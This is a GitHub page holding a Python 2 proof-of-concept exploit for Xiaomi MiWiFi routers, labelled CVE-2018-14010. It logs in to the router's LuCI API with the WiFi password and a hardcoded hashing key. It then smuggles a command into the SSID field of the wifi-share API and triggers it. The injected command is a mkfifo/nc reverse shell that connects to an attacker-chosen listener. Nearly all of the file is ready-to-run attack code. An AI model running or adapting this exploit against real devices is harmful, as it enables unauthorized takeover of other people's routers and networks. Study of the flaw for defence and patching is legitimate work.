-
Notifications
You must be signed in to change notification settings - Fork 3
/
CNVD-2018-04521.py
131 lines (116 loc) · 3.88 KB
/
CNVD-2018-04521.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#!/usr/local/bin/python
"""
CVE-2018-14010
CNVD-2018-04521 poc
Charles Jiang
"""
import sys
import pycurl
import StringIO
import urllib
import hashlib
import time
import random
import math
import json
def createnonce(mac):
varType = 0
varDeviceId = mac
varTime = math.floor(time.time() / 1000)
varRandom = math.floor(random.random() * 10000)
return '_'.join([str(varType), varDeviceId, str(varTime), str(varRandom)])
def oldPwd(pwd, nonce):
key = 'a2ffa5c9be07488bbb04a3a47d3c5f6a'
sha1obj = hashlib.sha1()
sha1obj.update(pwd + key)
p = sha1obj.hexdigest()
sha1obj1 = hashlib.sha1()
sha1obj1.update(nonce+p)
return sha1obj1.hexdigest()
def doLogin(ip,deviceId,pwd):
url = "http://"+ip+"/cgi-bin/luci/api/xqsystem/login"
nonce = createnonce(deviceId)
print "deviceId is %s , password is %s" % (deviceId, pwd)
post_data_dic = {"username":"admin" , 'password':oldPwd(pwd,nonce) , 'logtype':'2' , 'nonce':nonce }
crl = pycurl.Curl()
crl.setopt(pycurl.VERBOSE,1)
crl.setopt(pycurl.FOLLOWLOCATION, 1)
crl.setopt(pycurl.MAXREDIRS, 5)
# crl.setopt(pycurl.AUTOREFERER,1)
crl.setopt(pycurl.CONNECTTIMEOUT, 60)
crl.setopt(pycurl.TIMEOUT, 300)
# crl.setopt(pycurl.PROXY,proxy)
crl.setopt(pycurl.HTTPPROXYTUNNEL,1)
# crl.setopt(pycurl.NOSIGNAL, 1)
crl.fp = StringIO.StringIO()
# crl.setopt(pycurl.USERAGENT, "dhgu hoho")
# Option -d/--data <data> HTTP POST data
crl.setopt(crl.POSTFIELDS, urllib.urlencode(post_data_dic))
crl.setopt(pycurl.URL, url)
crl.setopt(crl.WRITEFUNCTION, crl.fp.write)
crl.perform()
result = crl.fp.getvalue()
r = json.loads(result)
return r["token"]
def genDeviceId():
return ":".join([str(int(random.random()*100)) for x in range(6)])
# eg:'2011-05-05 16:37:06'
def getTimeStamp(s):
return str(time.mktime(time.strptime(s, '%Y-%m-%d %X')))
def Post(url,post_data_dic):
crl = pycurl.Curl()
crl.setopt(pycurl.VERBOSE,1)
crl.setopt(pycurl.FOLLOWLOCATION, 1)
crl.setopt(pycurl.MAXREDIRS, 5)
# crl.setopt(pycurl.AUTOREFERER,1)
crl.setopt(pycurl.CONNECTTIMEOUT, 60)
crl.setopt(pycurl.TIMEOUT, 300)
# crl.setopt(pycurl.PROXY,proxy)
crl.setopt(pycurl.HTTPPROXYTUNNEL,1)
# crl.setopt(pycurl.NOSIGNAL, 1)
crl.fp = StringIO.StringIO()
# crl.setopt(pycurl.USERAGENT, "ie")
crl.setopt(crl.POSTFIELDS, urllib.urlencode(post_data_dic))
crl.setopt(pycurl.URL, url)
crl.setopt(crl.WRITEFUNCTION, crl.fp.write)
crl.perform()
print crl.fp.getvalue()
def doWifiShare(ip,lip,lport, tok):
url = "http://"+ip+"/cgi-bin/luci/;stok=" + tok + "/api/misns/wifi_share_switch"
shellcode = "rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/ash -i 2>&1 | nc " + lip + " " + lport + " " + " >/tmp/f"
post_data_dic = {"info": "{\"share\":1, \"guest\":1,\"data\":{\"ssid\":\" \\\" || " + shellcode + " || \\\"\",\"encryption\":\"psk2\",\"password\":\"ls -al\"}}" }
Post(url,post_data_dic)
def doGetWifiShareInfo(ip,tok):
url = "http://"+ip+"/cgi-bin/luci/;stok=" + tok + "/api/misns/wifi_share_info"
post_data_dic = {}
Post(url,post_data_dic)
def doExec(ip,tok):
url = "http://"+ip+"/cgi-bin/luci/;stok=" + tok + "/api/misns/wifi_share_rent_switch"
post_data_dic = {}
Post(url,post_data_dic)
def main():
if len(sys.argv) != 5:
print "exp.py wifipwd ipaddress lip lport"
return
wifipwd = sys.argv[1]
ip = sys.argv[2]
lip = sys.argv[3]
lport = sys.argv[4]
print "[+]Please listen on lport vai nc or some tools like that first."
print "[+]If exploit successful you will get a shell"
print "[+]Try to gettoken vai wifi password %s ..." % wifipwd
tok = doLogin(ip,genDeviceId(),wifipwd)
time.sleep(2)
print "[+]Token is %s " % tok
time.sleep(2)
print "[*]Inject shellcode..."
doWifiShare(ip,lip,lport,tok)
time.sleep(2)
print "[*]Show share wifi info..."
doGetWifiShareInfo(ip,tok)
time.sleep(10)
print "[*]Exploiting..."
doExec(ip,tok)
print "[+]You will get miwifi route shell on lport."
if __name__ == '__main__':
main()